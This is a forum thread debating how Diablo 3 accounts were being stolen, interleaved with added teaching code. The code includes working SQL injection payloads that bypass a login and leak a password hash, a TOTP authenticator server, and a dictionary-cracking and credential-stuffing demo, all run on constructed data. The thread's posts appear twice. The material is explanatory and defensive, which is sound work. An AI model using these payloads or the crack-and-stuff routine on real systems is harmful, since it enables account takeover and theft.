It's all he said she said. Sure a lot of these people could be lying. Sure Blizzard could also be lying. Only time will tell how this all plays out. All this could magically go away. /shrug
I'll take a blue post over random raging out forum nerds any day of the week on this matter.
I highly doubt that Blizzard would lie about this issue. It would be very damaging to their security to mislead the users in this way.
If the problem is on their end, they would need to be upfront about it. If it's not then they need to be as clear as possible so that people are aware of the threats to be avoided.
From a security perspective, lying here would do more harm than good.
Not if said hole was closed, they called all the users a bunch of whiny liars and quickly moved on. It'd be just a blip on the MMO radar, unlike if they had to come forward and say that there was an exploit that allowed people's stuff to be stolen. The big difference is you trust them to tell the truth and I trust them to do what's best for business.
Oh hey, yet another reason an optional single player offline mode would have been a good fucking idea. Sadly, this will do absolutely nothing to stifle the ignorant Blizzard defenders that obviously know anything and everything there is to know about Battle.net's security and how flawless the system as a whole is. Right?
I'll say this again since you may not have read my previous 30 billion posts on this topic.
I do not deny the possibility of an authentication exploit being present in a game such as this. It wouldn't be the first time.
I do deny the supposed "session hijacking" exploit being claimed by many people on the forums.
I have no reason to distrust Blizzard's official stance on this subject. If they say hackers are logging in through traditional means, I have not been able to find any evidence to contradict this.
I HAVE however found enough evidence to disprove the "session hijack" exploit that everyone is going on about.
In other words, there very well could be a vulnerability in the game that allows unauthorized authentication. I do not believe that is what is happening here. What Blizzard is saying officially goes right along with the research I have done on the matter. I have no reason to believe anything else until shown some kind of solid proof.
Speculation is fun. But I know the sessionjack is fake.
I don't buy the session jack theory either. It just doesn't make technical sense. I do believe there is mounting evidence that there is some sort of authentication exploit or bug. Sort of like what happened with Trion. The logic was accounted for and built into the server process. It just didn't work as advertised. Anything is possible with mechanisms as complex as this is. I will just continue to sit back with my popcorn.
It's possible, but I don't think it's happening.
I seriously think that the reports of hacks on the forums are being heavily inflated. I do believe that this is a standard run of the mill bunch of account hacks.
People on forums lie. They troll. They rage. They spam.
I don't see a bunch of posts on the forums about supposedly having an authenticator as being any kind of source of evidence. People will lie about anything to try to get who knows what.
I will take one blue post on those forums over 1,000 poorly written rage posts any day of the week.
Does this surprise you? For being the best and biggest MMO ever, their security is a joke. I have played almost all the big MMOs since WoW. Vanguard, LotRO, AoC, Rift, WAR, SWTOR, and Tera to name a few, and guess what, never have I been hacked except on Blizzard. Either Blizzard just doesn't care and it's a way to get people who haven't logged in a while to get their attention. Or they allow the gold sellers to hack people's accounts to keep them happy.
Whatever the reason is, that is one reason I will never put my information on any Blizzard website.
"Oh noes they hacked ma single player game which I was forced to play online!"
Whatever the source or scope to this, it's pretty painful. Another argument to also offer offline, locally stored single player only characters without AH access but I guess that's detrimental to their business model of taking cuts from transactions and gives pirates a slightly easier time (because there's no need to simulate a server).
Not sure if I am in any way a typical hack & slash player but I think of my hundreds of hours in D2 over the years, I played around 95% solo, 4,99% over LAN with friends and 0,01% over the net with people I didn't know.
I'm glad I left before the claws could be dug into my account however they are doing it. So far, it's all good still, they missed me. Blizzard better find and fix the vulnerability asap. Won't be returning, maybe look at Torchlight 2 or wait for GW2 for the next game fix.. or just back to WoW.
Everyone knows that when accounts get stolen 99.9% of the time it is the users own fault. Everything in that article is speculation.. words like 'suggested' are evidence that the whole article is completely factless. Even the word 'hacked' isn't accurate right now because no one knows why those items went missing.
I'm sorry, but did you even read that article? It could have been an SQL injection attack to compromise the account information database to easily gain access.
Additionally, if Diablo 3's servers have THOSE easily abused kinds of vulnerabilities then I'm glad I didn't buy the game for other reasons.
The Theory of Conservative Conservation of Ignorant Stupidity: Having a different opinion must mean you're a troll.
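The post above raises SQL injection against the account database as one possible explanation. The following is an added example, not code from the original thread and not Blizzard's code, showing what that would actually look like on a toy login routine: the same "username" input bypasses a string-built query and even pulls another user's stored hash out of it, while a parameterized query treats the input as data. The table, the user names and the passwords are constructed for the example; the plain SHA-256 storage is deliberately simplistic so the injected hash is recognizable.

```python
import hashlib
import sqlite3


def sha256_hex(password: str) -> str:
    """Toy password hashing for the example only (no salt, fast hash)."""
    return hashlib.sha256(password.encode()).hexdigest()


def build_db() -> sqlite3.Connection:
    """Constructed in-memory account table with two made-up users."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE accounts (username TEXT PRIMARY KEY, pw_hash TEXT)")
    for user, pw in [("alice", "correct horse battery staple"), ("bob", "hunter2")]:
        conn.execute("INSERT INTO accounts VALUES (?, ?)", (user, sha256_hex(pw)))
    conn.commit()
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str):
    """Builds the SQL text with string formatting: the username becomes part of the query.

    Returns the matched username (or whatever the injected query selects), or None.
    """
    sql = (
        "SELECT username FROM accounts "
        f"WHERE username = '{username}' AND pw_hash = '{sha256_hex(password)}'"
    )
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(conn: sqlite3.Connection, username: str, password: str):
    """Same check with a parameterized query: quotes and '--' in the input stay data."""
    row = conn.execute(
        "SELECT username FROM accounts WHERE username = ? AND pw_hash = ?",
        (username, sha256_hex(password)),
    ).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    conn = build_db()
    # Closing the quote and commenting out the password check logs in as alice with any password.
    bypass = "alice' -- "
    print("vulnerable:", login_vulnerable(conn, bypass, "wrong"))   # alice
    print("safe:      ", login_safe(conn, bypass, "wrong"))         # None
    # A UNION turns the login form into a read primitive on the same table.
    dump = "' UNION SELECT pw_hash FROM accounts WHERE username='bob' -- "
    print("leaked hash:", login_vulnerable(conn, dump, "x"))         # bob's stored hash
```

The second payload is the part that matters for this thread: once a login form leaks stored hashes, the attacker is no longer guessing passwords online, and the fast unsalted hash used here would fall to an offline dictionary run in seconds.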
Who'd have thought?!
Blizzard going "online only" to prevent hackers is like filling your swimming pool with ocean water to keep sharks out... lol!
Error: 37. Signature not found. Please connect to my server for signature access.
I've added the authenticator to my battle.net account before I even entered the d3 product code on the web.
So for whoever still didn't do that or doesn't want to waste more money on this "keychain authenticator": you can always just download it for your smartphone (which I did as well) and add it to your account.
There's also this "self help" option you can add to your account which enables you to enter your mobile phone number, and they contact you via SMS if something suspicious happens with your account. This way you can get your account back with much less hassle with customer support or their webforms. It's simple, you just use your own phone and the SMS they give you. I think that's a neat way to secure your account even in case the authenticator does not stop them from hacking your account.
Oh and, the best part of the SMS service is that it's free!
"Happiness is not a destination. It is a method of life." -------------------------------
At least they're trying... For every million they make, there's 2 million they lost due to piracy... They had to fight it with something.
But when it comes to the internet, nothing is flawless and hack-proof. Hell, the Pentagon's security was taken down more than once, and look at the money they spend to prevent that from happening.
There's always some "evil" genius who'll bypass all the security and break in. Always.
I am not sure if anyone has mentioned this, but the authenticator is not verified every time you log in to D3. As a matter of fact, I have not been asked to use my authenticator in the last 6 times that I have logged in. I can see where accounts might be hacked even if they have an authenticator, if it does not have to be used. As much of a pain as it is to use it, I would rather Blizzard ask me to use my authenticator EVERY time I log in. I don't understand why Blizzard does not do this.
The only thing I see as "possible" with this session theory is the following.
When I'm kicked out of the server I sometimes can't login back instantly because my "character isn't out of the game yet". But when this doesn't happen I can pop back into the game without any need of authenticator! Probably the account remembers it was entered before and doesn't require me to enter it again since it probably didn't even notice I was gone from the servers and that allows them to exploit that?
Originally posted by Gaborik Does this surprise you? For being the best and biggest MMO ever, their security is a joke. I have played almost all the big MMOs since WoW. Vanguard, LotRO, AoC, Rift, WAR, SWTOR, and Tera to name a few, and guess what, never have I been hacked except on Blizzard. Either Blizzard just doesn't care and it's a way to get people who haven't logged in a while to get their attention. Or they allow the gold sellers to hack people's accounts to keep them happy. Whatever the reason is, that is one reason I will never put my information on any Blizzard website.
That's your situation. I played WoW, EVE Online, Aion and Rift. Well, more to be honest, but those I played for more than one week. Of those, people "hacked" my Aion account and my Rift account. My WoW account hasn't been compromised yet. You say only your WoW account was hacked. Okay, perhaps you had some malicious software on your PC. It makes sense that people directly go for your WoW account, because it's the most popular one of all the games you listed. You didn't give enough information anyway to make a decent guess, like what you had installed at the time you were hacked, if you got a new rig since then, etc. But to me it sounds kind of like the whole Windows/Mac thing: people with Windows are more likely to get bothered by malicious software, because that OS is used way more than OS X.
If anything, I believe that my information is more secure with Blizzard than with other companies. For one, they have multiple security layers and they're pretty transparent when something is happening. They might not be the quickest, but they keep people updated.
To the OP, thekid1, it's true that you only need to input the security code once every week. However, if someone tries to login from another location, they need to input the security token. Normally these codes can be obtained through various methods (the "man-in-the-middle" method), but with games it's a bit more tricky. They can't just redirect you to a vague login screen in the way that happens with online banking for example. It's actually pretty hard to obtain a security code from the Blizzard Authenticator. For that reason I believe Blizzard when they say that there is no evidence yet of people being "hacked" when they make use of the authenticator.
A bit off-topic, but to the rainbow pony robocop man, please, if you don't know what you're talking about, don't say anything at all. I know you hate the always-online bit and that you try to sound knowledgeable, but you only make yourself look stupid.
I mean: "Expect a rollercoaster month as people begin to get brute force hacked more and more."
...
Brute force hacked...really? You suggested in another topic that a few people, including me, should look up some wiki's about "how to hack servers". My suggestion to you is look up some websites about Information Security, Authentication and Encryption and educate yourself a bit. Please, for my sanity, just do it.
If people's accounts get compromised, then dubyahite nailed it. People are lazy and don't remember difficult passwords easily, hence they tend to reuse them a lot. That site that got hacked probably has some people that use the same accounts/passwords for that site as for battle.net. Chances are that they got more information though, who knows what that site registered. But examples like that are how people's accounts get compromised, without them having any malicious software on their own systems.
I have a hard time imagining some lonely hacker, perhaps a small group, pooling up their hardware resources and botnets to brute force some accounts. The thought is just hilarious.
I am not sure if anyone has mentioned this, but the authenticator is not verified every time you log in to D3. As a matter of fact, I have not been asked to use my authenticator in the last 6 times that I have logged in. I can see where accounts might be hacked even if they have an authenticator, if it does not have to be used. As much of a pain as it is to use it, I would rather Blizzard ask me to use my authenticator EVERY time I log in. I don't understand why Blizzard does not do this.
Double post perhaps, but you can do this. It's in your Battle.net account -> options for the authenticator and there you need to check the box that says "Ask for authentication every time you log in" or something like that.
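The last few posts describe three behaviours of the authenticator: the code is only demanded once in a while on a known machine, a login from another location is challenged again, and there is an account option to demand it on every login. The block below is an added example, not the thread's or Blizzard's code, of a toy login server that implements those rules on top of standard RFC 6238 TOTP. Assumptions: the posts never say which algorithm the Blizzard Authenticator uses, so plain TOTP (HMAC-SHA1, 30-second step, 6 digits) stands in for it; the "once a week" behaviour is modelled as a per-device trust window keyed on a hypothetical device id; user names, secrets and timestamps are constructed. The server also refuses to accept a code twice, which is the property that makes a code captured by a man-in-the-middle worth much less than the password it accompanies.

```python
import hashlib
import hmac
import secrets
import struct
import time

STEP = 30      # RFC 6238 default time step in seconds
DIGITS = 6     # length of the displayed code


def totp(secret: bytes, at: int, step: int = STEP, digits: int = DIGITS) -> str:
    """Standard TOTP: HMAC-SHA1 over the time counter, dynamic truncation, mod 10^digits."""
    counter = at // step
    mac = hmac.new(secret, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = mac[-1] & 0x0F
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % (10 ** digits)).zfill(digits)


class AuthServer:
    """Toy password + TOTP login with a per-device trust window and replay rejection."""

    REMEMBER_SECONDS = 7 * 24 * 3600   # assumption: the 'once a week' the posts describe

    def __init__(self, always_require_code: bool = False):
        self.users = {}            # username -> {"password": str, "secret": bytes}
        self.used_counters = {}    # username -> set of TOTP counters already accepted
        self.trusted = {}          # (username, device_id) -> expiry timestamp
        self.sessions = {}         # session token -> (username, device_id)
        self.always_require_code = always_require_code   # the 'ask every time' option

    def register(self, username: str, password: str, secret: bytes) -> None:
        self.users[username] = {"password": password, "secret": secret}

    def _verify_code(self, username: str, secret: bytes, code: str, now: int) -> bool:
        """Accept the current step or one either side, but never the same counter twice."""
        used = self.used_counters.setdefault(username, set())
        for skew in (-1, 0, 1):
            counter = now // STEP + skew
            if counter in used:
                continue
            if hmac.compare_digest(totp(secret, counter * STEP), code):
                used.add(counter)
                return True
        return False

    def login(self, username: str, password: str, device_id: str, code=None, now=None):
        """Returns a session token on success, None otherwise."""
        now = int(time.time()) if now is None else now
        user = self.users.get(username)
        if user is None or not hmac.compare_digest(user["password"], password):
            return None
        trusted_until = self.trusted.get((username, device_id), 0)
        needs_code = self.always_require_code or trusted_until <= now
        if needs_code:
            if code is None or not self._verify_code(username, user["secret"], code, now):
                return None
            self.trusted[(username, device_id)] = now + self.REMEMBER_SECONDS
        token = secrets.token_hex(16)
        self.sessions[token] = (username, device_id)
        return token


def demo() -> dict:
    """Walks through the scenarios from the thread; every value should be True."""
    secret = b"12345678901234567890"      # constructed; also the RFC 6238 test-vector key
    t0 = 1_700_000_000
    srv = AuthServer()
    srv.register("alice", "pw", secret)
    code = totp(secret, t0)
    return {
        "new_device_without_code_refused": srv.login("alice", "pw", "pc1", now=t0) is None,
        "new_device_with_code_ok": srv.login("alice", "pw", "pc1", code, now=t0) is not None,
        "same_code_replayed_from_elsewhere_refused":
            srv.login("alice", "pw", "pc2", code, now=t0) is None,
        "reconnect_on_trusted_device_needs_no_code":
            srv.login("alice", "pw", "pc1", now=t0 + 3600) is not None,
        "other_location_still_needs_code":
            srv.login("alice", "pw", "pc2", now=t0 + 3600) is None,
        "trust_expires_after_window":
            srv.login("alice", "pw", "pc1", now=t0 + 8 * 24 * 3600) is None,
        "always_require_option_asks_every_time": _strict_demo(secret, t0),
    }


def _strict_demo(secret: bytes, t0: int) -> bool:
    strict = AuthServer(always_require_code=True)
    strict.register("alice", "pw", secret)
    first = strict.login("alice", "pw", "pc1", totp(secret, t0), now=t0)
    second = strict.login("alice", "pw", "pc1", now=t0 + 60)   # same device, a minute later
    return first is not None and second is None


if __name__ == "__main__":
    for name, ok in demo().items():
        print(f"{name}: {ok}")
```

The point the thread circles around is visible in the `reconnect_on_trusted_device_needs_no_code` case: once a device is trusted, the server deliberately skips the code, so the authenticator only helps against someone logging in from a device the server has not seen, and the `always_require_code` flag is what removes that window.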
I'm sorry, but did you even read that article? It could have been an SQL injection attack to compromise the account information database to easily gain access.
Additionally, if Diablo 3's servers have THOSE easily abused kinds of vulnerabilities then I'm glad I didn't buy the game for other reasons.
Aha! Now there's an interesting idea.
I highly doubt that Blizzard's username databases are vulnerable to SQL injection, however. Blizzard has a huge target on their back, and if it was that simple they would have huge problems. There is no way Blizzard of all people can't protect against simple SQL injection.
But let's run with that thought. Let's say for argument that somehow through some means a hacker got ahold of the database. It's totally plausible. Heck it could be a low-tech hack from an employee or something.
Now, no database in the world is totally immune to compromise. So we're not even looking at something Blizzard specific here, but just general flaws in database technology and/or corrupt people with access to the database.
So he's got to brute force those passwords.
Guess whose passwords aren't going to succumb to a dictionary attack? Anyone with a decently complex password.
If your password is dictionary based, they've got it. If it's not they don't.
So assuming we know that any (and I do mean any) this places great importance on the user to come up with unique complex passwords that are not susceptible to brute force or dictionary attacks. This is one security principle that has been preached over and over and over again. This part is your responsibility.
Now, I don't mean to place blame on the user here. It is obviously the company's responsibility to protect their database no matter what. Thing is, no data is truly safe.
I sleep better at night knowing that when a database is stolen, the odds of the crackers getting at my password are so small that it's never going to happen. They are going to get about 1/4 of the passwords, which is plenty.
Besides that, there are laws in place that require a company to notify its users in some fashion if any database containing personal information is compromised. As MMO gamers we should all be familiar with companies doing this (SOE for example). You can be sure that if Blizzard's database has been compromised, we will know about it.
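Two posts above make the same practical argument from different directions: one says that when some other site's database leaks, the reused passwords in it are what get battle.net accounts taken, and the one just above says that a stolen hash table only gives up the dictionary-based passwords. The following added example, not from the original thread, runs that whole chain on constructed data: a "leaked" table of salted PBKDF2 hashes from a hypothetical unrelated site, a small wordlist with a few mangling rules, an offline crack of that table, and then the recovered credentials tried against a second, hypothetical game service to see which accounts fall with no vulnerability on the target at all. User names, passwords, the wordlist and the low iteration count are all assumptions made so the example runs offline in well under a second.

```python
import hashlib
import hmac
import os

# Kept low so the example runs quickly; a real deployment would use a far higher
# count or a memory-hard KDF. This is an assumption of the example, not a recommendation.
ITERATIONS = 1000


def hash_password(password: str, salt: bytes) -> bytes:
    """Salted PBKDF2-HMAC-SHA256 as the stored verifier on both sites."""
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)


def make_record(username: str, password: str) -> dict:
    salt = os.urandom(16)
    return {"username": username, "salt": salt, "hash": hash_password(password, salt)}


# Constructed dump from some unrelated forum site. user_d chose a long random password.
LEAKED = [
    make_record("user_a", "diablo"),
    make_record("user_b", "Password1"),
    make_record("user_c", "dragon123"),
    make_record("user_d", "Xq7!vL2#pR9m"),
]

# Constructed accounts on the target service. user_a and user_b reused their password,
# user_c did not, user_d reused a password the attacker never recovers.
TARGET = [
    make_record("user_a", "diablo"),
    make_record("user_b", "Password1"),
    make_record("user_c", "unique-and-different-here"),
    make_record("user_d", "Xq7!vL2#pR9m"),
]

# Constructed wordlist; real attacks use millions of entries and far richer rules.
WORDLIST = ["password", "diablo", "dragon", "letmein", "blizzard"]


def candidates(wordlist):
    """Each word as-is and capitalized, with common suffixes appended."""
    for word in wordlist:
        for base in (word, word.capitalize()):
            yield base
            for suffix in ("1", "123", "!"):
                yield base + suffix


def crack(leaked, wordlist) -> dict:
    """Offline dictionary attack: salt means each user is hashed separately, but
    the salt does not slow down guessing any single weak password."""
    guesses = list(candidates(wordlist))
    recovered = {}
    for rec in leaked:
        for guess in guesses:
            if hmac.compare_digest(hash_password(guess, rec["salt"]), rec["hash"]):
                recovered[rec["username"]] = guess
                break
    return recovered


def credential_stuffing(recovered: dict, target) -> list:
    """Replay recovered username/password pairs against the target's own verifier.
    In practice this is a stream of ordinary-looking logins, which is why the
    target sees nothing unusual in its own code."""
    by_name = {rec["username"]: rec for rec in target}
    compromised = []
    for username, password in recovered.items():
        rec = by_name.get(username)
        if rec and hmac.compare_digest(hash_password(password, rec["salt"]), rec["hash"]):
            compromised.append(username)
    return sorted(compromised)


if __name__ == "__main__":
    found = crack(LEAKED, WORDLIST)
    print("recovered from the leak:", found)
    print("accounts that fall on the target:", credential_stuffing(found, TARGET))
```

Three of the four leaked users fall to forty guesses each; the random password survives because no wordlist contains it, and user_c survives on the target only because they did not reuse the password. Neither outcome depends on anything the target service did, which is the point made in the thread about password reuse.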
Client's fault. A hacker or group of hackers would not just hack this one dude's account... It's a lot of work. They would have hacked a whole series... Just saying the guy in question is not credible.
"The King and the Pawn return to the same box at the end of the game"
The only thing I see as "possible" with this session theory is the following.
When I'm kicked out of the server I sometimes can't login back instantly because my "character isn't out of the game yet". But when this doesn't happen I can pop back into the game without any need of authenticator! Probably the account remembers it was entered before and doesn't require me to enter it again since it probably didn't even notice I was gone from the servers and that allows them to exploit that?
This is an interesting point.
If this is the case, hackers may have found a way to Deauth other users from Diablo. This would give them that window to log in without needing an authenticator.
Deauth attacks are a possibility.
Or it might be something as simple as a denial of service attack on the users IP. This actually seems more likely since people are reporting that they have lost connection and/or had slow webpage loading before they lost all of their stuff in some instances. I doubt they have some exploit to deauth you from within the game, but it's possible.
Most of the time it's the person's fault because he's being careless... Not adding the authenticator, going to fishy websites and stuff like that...
But, it's all over the D3 official forums, people are indeed getting hacked xD Thank god I had no problems for now.
That doesn't mean it's the client's fault. This is the very definition of correlation without causation.
It doesn't have to be the client's fault to be a bulk attack like you described. This thread is filled with other examples of attacks that could have caused this on a large scale.
Betaguy doesn't mean the client, but more like the author. Client can't be wrong, would be Blizzard then
I don't know if I agree that it is a good argument for offline play. MMOs are susceptible to the same attacks and I don't think anyone would argue that they should support offline play (what's the point).
I'm not saying D3 is an MMO, and I agree that if there was offline play some people would not be affected, but it doesn't solve the problem. More and more games are going to be faced with issues like this (and already have been in the mmo world for years).
For those of you that would prefer to play offline only or for the vast majority of your time, then yes you wouldn't have to worry about something like this.
However, this is just one game of many. If it wasn't D3 right now it would just be another online game somewhere else. I have no doubt that there are people playing D3 right now, that would have been playing offline, who were also affected by the hack.
I sympathize with those people, I really do.
However, I don't think you make a design decision like online only based on security, and that is coming from a very security minded individual. They have to make the games they want the way they want to. If the market will support their game (which it obviously is in this case) then they have nothing to be sorry about in that sense.
If Diablo 3 were an MMO (a terrible one I'm sure) we would have the same thing going on, but no one would be questioning if it should have offline play or not.
FPS games have evolved over the years. We now have FPS games that are strictly online. Global Agenda, Tribes Ascend, Blacklight Retribution to name a few off the top of my head. I'm sure there are better examples, but not all FPS games have an offline mode even though they used to, just like not all hack & slash games have the online-only requirement.
Those FPS games were designed with a specific purpose in mind. Online only play, and that's fine. If you don't like that type of thing then you don't have to buy it, which you obviously know.
The fact is that making this one game have an offline only mode doesn't solve the problem. It doesn't even solve the problem for this one specific game as many people would still choose to play online. D3 would still face the same issue it is currently facing.
At least they're trying... For every million they make, there's 2 million they lost due to piracy... They had to fight it with something.
But when it comes to the internet, nothing is flawless and hack-proof. Hell, the Pentagon's security was taken down more than once, and look at the money they spend to prevent that from happening.
There's always some "evil" genius who'll bypass all the security and break in. Always.
No, they are NOT trying. That is my point. Making the game offline only would prevent hacks, not the other way.
They know what they are doing though. After a few thousand people get their real life bank accounts robbed through the RMT AH/paypal un-dynamic duo, there will be a massive outcry, which Blizzard will answer by announcing a new "super-authenticator" which will probably log you into the game automatically, and will definitely cost way more than it should.
Error: 37. Signature not found. Please connect to my server for signature access.
Comments
Not if said hole was closed, they called all the users a bunch of whiney liars and quickly moved on. It'd be just a blip on the MMO radar unlike if they had to come forward and say that there was an exploit that allow peoples stuff to be stolen. The big difference is you trust them to tell the truth and I trust them to do what's best for business.
Oh hey, yet another reason an optional single player offline mode would have been a good fucking idea. Sadly, this will do absolutely nothing to stifle the ignorant Blizzard defenders that obviously know anything and everything there is to know about Battle.net's security and how flawless the system as a whole is. Right?
Who'd have thought?!
I'll say this again since you may not have read my previous 30 billion posts on this topic.
I do not deny the possibility of an authentication exploit being present in a game such as this. It wouldn't be the first time.
I do deny the supposed "Session high-jacking" exploit being claimed by many people on the forums.
I have no reason to distrust Blizzards official stance on this subject. If they say hackers are logging in through traditional means, I have not been able to find any evidence to contradict this.
I HAVE however found enough evidence to disprove the "session highjack" exploit that everyone is going on about.
In other words, there very well could be a vulnerability in the game that allows unauthorized authentication. I do not believe that is what is happening here. What Blizzard is saying officially goes right along with the research I have done on the matter. I have no reason to believe anything else until shown some kind of solid proof.
Speculation is fun. But I know the sessionjack is fake.
Shadow's Hand Guild
Open recruitment for
The Secret World - Dragons
Planetside 2 - Terran Republic
Tera - Dragonfall Server
http://www.shadowshand.com
I don't buy the session jack theory either. It just doesn't make technical sense. I do believe there is mounting evidence that there is some sort of authentication expoit or bug. Sort of like what happened with Trion. The logic was accounted for and built into the server process. It just didn't work as advertised. Anything is possible with mechanisms as complex as this is. I will just continue to sit back with my popcorn.
It's possible, but I don't think it's happening.
I seriously think that the reports of hacks on the forums are being heavily inflated. I do believe that this is a standard run of the mill bunch of account hacks.
People on forums lie. They troll. They rage. They spam.
I don't see a bunch of posts on the forums about supposedly having an authenticator as being any kind of source of evidence. People will lie about anything to try to get who knows what.
I will take one blue post on those forums over 1,000 poorly written rage posts any day of the week.
Shadow's Hand Guild
Open recruitment for
The Secret World - Dragons
Planetside 2 - Terran Republic
Tera - Dragonfall Server
http://www.shadowshand.com
Whatever the reason is that is one reason i will never put my information on any blizzard website.
"Oh noes they hacked ma single player game which I was forced to play online!"
Whatever the source or scope to this, it's pretty painful. Another argument to also offer offline, locally stored single player only characters without AH access but I guess that's detrimental to their business model of taking cuts from transactions and gives pirates a slightly easier time (because there's no need to simulate a server).
Not sure if I am in any way a typical hack & slash player but I think of my hundreds of hours in D2 over the years, I played around 95% solo, 4,99% over LAN with friends and 0,01% over the net with people I didn't know.
My brand new bloggity blog.
I'm glad I left before the claws could be dug into my account however they are doing it. So far, it's all good still, they missed me. Blizzard better find and fix the vulnerability asap. Won't be returning, maybe look at Torchlight 2 or wait for GW2 for the next game fix.. or just back to WoW.
I'm sorry, but did you even read that article? It could have been an SQL injection attack to compromise the account information database to easily gain access.
Additionally, if Diablo 3's servers have THOSE easily abused kind of vulnerabilities then I'm glad I didn't buy the game for other reaons.
The Theory of Conservative Conservation of Ignorant Stupidity:
Having a different opinion must mean you're a troll.
Error: 37. Signature not found. Please connect to my server for signature access.
I've added the authenticator to my battle.net account before I even entered the d3 product code on the web.
So for whoever still didn't do that or doesn't want to waste more money on this "keychain authenticator", you can always just download it for your smartphone (which I did as well) and add it to your account.
There's also this "self help" option you can add to your account which enables you to enter your mobile phone number, and they contact you via SMS if something suspicious happens with your account. This way you can get your account back with much less hassle with customer support or their webforms. It's simple, you just use your own phone and the SMS they give you. I think that's a neat way to secure your account even in case the authenticator does not stop them from hacking your account.
Oh and, the best part of the SMS service is that it's free!
"Happiness is not a destination. It is a method of life."
-------------------------------
At least they're trying... For every million they make, there are 2 million they lost due to piracy... They had to fight it with something.
But, when it comes to the internet, nothing is flawless and hackproof. Hell, the Pentagon's security was taken down more than once, and look at the money they spend to prevent that from happening.
There's always some "evil" genius who'll bypass all the security and breach in. Always.
I am not sure if anyone has mentioned this, but the authenticator is not verified every time you log in to D3. As a matter of fact, I have not been asked to use my authenticator in the last 6 times that I have logged in. I can see where accounts might be hacked even if they have an authenticator, if it does not have to be used. As much of a pain as it is to use it, I would rather Blizzard ask me to use my authenticator EVERY time I log in. I don't understand why Blizzard does not do this.
The only thing I see as "possible" with this session theory is the following.
When I'm kicked out of the server I sometimes can't log back in instantly because my "character isn't out of the game yet". But when this doesn't happen I can pop back into the game without any need for the authenticator! Probably the account remembers it was entered before and doesn't require me to enter it again, since it probably didn't even notice I was gone from the servers, and that allows them to exploit that?
That's your situation. I played WoW, EVE Online, Aion and Rift. Well, more to be honest, but those I played for more than one week. Of those, people "hacked" my Aion account and my Rift account. My WoW account hasn't been compromised yet. You say only your WoW account was hacked. Okay, perhaps you had some malicious software on your PC. It makes sense that people directly go for your WoW account, because it's the most popular one of all the games you listed. You didn't give enough information anyway to make a decent guess, like what you had installed at the time you were hacked, if you got a new rig since then, etc. But to me it sounds kind of like the whole Windows/Mac thing: people with Windows are more likely to get bothered by malicious software, because that OS is used way more than OSX.
If anything, I believe that my information is more secure with Blizzard than with other companies. For one, they have multiple security layers and they're pretty transparent when something is happening. They might not be the quickest, but they keep people updated.
To the OP, thekid1, it's true that you only need to input the security code once every week. However, if someone tries to login from another location, they need to input the security token. Normally these codes can be obtained through various methods (the "man-in-the-middle" method), but with games it's a bit more tricky. They can't just redirect you to a vague login screen in the way that happens with online banking, for example. It's actually pretty hard to obtain a security code from the Blizzard Authenticator. For that reason I believe Blizzard when they say that there is no evidence yet of people being "hacked" when they make use of the authenticator.
A bit off topic, but to the rainbow pony robocop man, please, if you don't know what you're talking about, don't say anything at all. I know you hate the always online bit and that you try to sound knowledgeable, but you only make yourself look stupid.
I mean: "Expect a rollercoaster month as people begin to get brute force hacked more and more."
...
Brute force hacked...really? You suggested in another topic that a few people, including me, should look up some wikis about "how to hack servers". My suggestion to you is to look up some websites about Information Security, Authentication and Encryption and educate yourself a bit. Please, for my sanity, just do it.
If people's accounts get compromised, then dubyahite nailed it. People are lazy and don't remember difficult passwords easily, hence they tend to reuse them a lot. That site that got hacked probably has some people that use the same accounts/passwords for that site as for battle.net. Chances are that they got more information though, who knows what that site registered. But examples like that are how people's accounts get compromised, without them having any malicious software on their own systems.
I have a hard time imagining some lonely hacker, perhaps a small group, pooling up their hardware resources and botnets to brute force some accounts. The thought is just hilarious.
Double post perhaps, but you can do this. It's in your Battle.net account -> options for the authenticator and there you need to check the box that says "Ask for authentication every time you log in" or something like that.
Aha! Now there's an interesting idea.
I highly doubt that Blizzard's username databases are vulnerable to SQL injection, however. Blizzard has a huge target on their back, and if it was that simple they would have huge problems. There is no way Blizzard of all people can't protect against simple SQL injection.
But let's run with that thought. Let's say for argument that somehow, through some means, a hacker got hold of the database. It's totally plausible. Heck, it could be a low-tech hack from an employee or something.
Now, no database in the world is totally immune to compromise. So we're not even looking at something Blizzard specific here, but just general flaws in database technology and/or corrupt people with access to the database.
So he's got to brute force those passwords.
Guess whose passwords aren't going to succumb to a dictionary attack? Anyone with a decently complex password.
If your password is dictionary based, they've got it. If it's not they don't.
So assuming we know that any (and I do mean any) this places great importance on the user to come up with unique complex passwords that are not susceptible to brute force or dictionary attacks. This is one security principle that has been preached over and over and over again. This part is your responsibility.
Now, I don't mean to place blame on the user here. It is obviously the company's responsibility to protect their database no matter what. Thing is, no data is truly safe.
I sleep better at night knowing that when a database is stolen, the odds of the crackers getting at my password are so small that it's never going to happen. They are going to get about 1/4 of the passwords, which is plenty.
Besides that, there are laws in place that require a company to notify its users in some fashion if any database containing personal information is compromised. As MMO gamers we should all be familiar with companies doing this (SOE for example). You can be sure that if Blizzard's database has been compromised, we will know about it.
Client's fault. A hacker or group of hackers would not just hack this one dude's account... It's a lot of work, they would have hacked a whole series... just saying the guy in question is not credible.
This is an interesting point.
If this is the case, hackers may have found a way to Deauth other users from Diablo. This would give them that window to log in without needing an authenticator.
Deauth attacks are a possibility.
Or it might be something as simple as a denial of service attack on the user's IP. This actually seems more likely, since people are reporting that they lost connection and/or had slow webpage loading before they lost all of their stuff in some instances. I doubt they have some exploit to deauth you from within the game, but it's possible.
Most of the time it's the person's fault because he's being careless... Not adding an authenticator, going to fishy websites and stuff like that...
But, it's all over the D3 official forums, people are indeed getting hacked xD Thank god I had no problems for now.
That doesn't mean it's the client's fault. This is the very definition of correlation without causation.
It doesn't have to be the client's fault to be a bulk attack like you described. This thread is filled with other examples of attacks that could have caused this on a large scale.
Betaguy doesn't mean the client, but more like the author. The client can't be wrong, it would be Blizzard then.
I don't know if I agree that it is a good argument for offline play. MMOs are susceptible to the same attacks, and I don't think anyone would argue that they should support offline play (what's the point).
I'm not saying D3 is an MMO, and I agree that if there was offline play some people would not be affected, but it doesn't solve the problem. More and more games are going to be faced with issues like this (and already have been in the mmo world for years).
For those of you that would prefer to play offline only or for the vast majority of your time, then yes you wouldn't have to worry about something like this.
